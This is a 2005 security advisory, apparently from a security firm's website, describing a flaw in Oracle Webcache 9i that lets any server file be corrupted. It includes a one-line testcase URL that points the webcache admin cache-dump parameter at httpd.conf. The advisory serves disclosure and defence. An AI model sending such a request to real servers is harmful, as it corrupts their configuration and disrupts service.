Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
|
Append file in Oracle Webcache 9i
Name |
Append file in Oracle Webcache 9i |
Systems Affected |
Oracle Application Server with Webcache 9i |
Severity |
Medium Risk |
Category |
Corruption of files |
Vendor URL |
http://www.oracle.com/ |
Author |
Alexander Kornbrust (ak at red-database-security.com) |
Date |
11 May 2005 (V 1.02) |
CAN-Number |
CAN-2005-1382 |
Details
It is possible to corrupt any file of an Oracle Application Server
installation by appending garbage to the file (e.g. httpd.conf).
This issue can be combined with cross site scripting vulnerabilities in the webcache administrator application.
Patch Information
Oracle fixed this issue with informing me or their customers.
Testcase
http://server01:4000/webcacheadmin?SCREEN_ID=CGA.CacheDump&ACTION=Submit&
index=1&cache_dump_file=/opt/ORACLE/ias/9.0.2/Apache/Apache/conf/httpd.conf
History
23-sep-2003 Oracle was secalert informed
23-sep-2003 Bug confirmed
26-apr-2005 Red-Database-Security published this advisory
11-may-2005 CAN added
© 2005 by Red-Database-Security GmbH - last update 03-nov-2005
|
Oracle Webcache
Oracle Webcache is part of the Oracle Application Server aka OAS aka IAS
The Oracle Web Cache can be used to cache static and dynamically generated web pages. The cache shouild be your first point for accepting user requests from clients using web browsers.
The Web Cache also provides load balancing and can route non-cached requests to a set of web servers. This privides protection when some of the servers are overloaded or become inaccessable.
|